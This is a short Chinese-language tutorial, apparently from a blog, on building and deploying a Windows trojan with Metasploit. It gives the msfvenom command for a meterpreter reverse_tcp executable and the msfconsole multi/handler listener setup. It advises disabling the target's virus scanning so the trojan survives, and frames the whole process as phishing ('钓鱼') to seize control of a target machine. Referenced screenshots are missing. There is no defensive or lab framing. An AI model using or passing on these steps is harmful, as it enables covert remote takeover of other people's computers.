1.打开kali获取root权限
2.使用msf生成木马后门 (制作鱼钩)
输入:msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=本地ip lport=自定义端口 -f exe -o demo9999.exe
参数:
-p payload 攻击载荷
windows 目标机器系统版本
demo9999.exe 木马后门程序的名称
-f 输出木马文件的格式
-o 输入地址
配置好参数回车之后有如下提示即生成成功
将目标程序放入目标机 (注意关闭安全中心病毒扫描设置,否则木马程序会被清除)
3.利用msfconsole等待获取目标机操作权限 (钓鱼)
运行msfconsole:msfconsole
选择模块:use exploit/multi/handler
配置攻击载荷:windows/x64/meterpreter/reverse_tcp 配置监听地址:set lhost 本地ip
配置监听端口:set lport 与之前木马文件自定义端口一致
运行:run
有如下提示即运行成功
3.拿到目标机控制权限
当目标机打开exe木马后门时会有如下提示
此时已经拿到目标机的操作权限
输入help即可查看可执行命令